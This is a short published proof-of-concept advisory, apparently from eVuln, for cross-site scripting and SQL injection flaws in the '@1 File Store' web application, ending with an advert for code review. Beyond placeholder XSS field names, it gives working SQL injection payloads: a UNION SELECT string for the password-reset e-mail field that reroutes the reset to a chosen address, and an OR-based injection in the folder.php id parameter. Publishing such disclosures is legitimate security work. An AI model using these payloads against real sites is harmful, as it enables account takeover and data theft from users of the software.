PoC/Exploit for Multiple XSS and SQL Injection in @1 File Store
Published Proof of Concept code - Multiple XSS and SQL Injection in @1 File Store.
- Description
- Available
- Solution
- Not available - check vendor's website
1. Cross-Site Scripting Example:
URL: http://[host]/filestore/signup.php
Real Name: [XSS]
E-mail: [XSS]
Login: [XSS]
2. SQL Injection Examples:
URL: http://[host]/filestore/password.php
E-mail: 99999' union select 1,2,3,4,5,6,7,8,9,10,'hello','world','[send_to_email]',14,15,16/*
Registered user:
http://[host]/filestore/folder.php?id=999'%20or%201/*
Order Source Code Test made by eVuln
Protect against attacks by source code review of your website or web application made by our team.The work will be done by experts in web application security.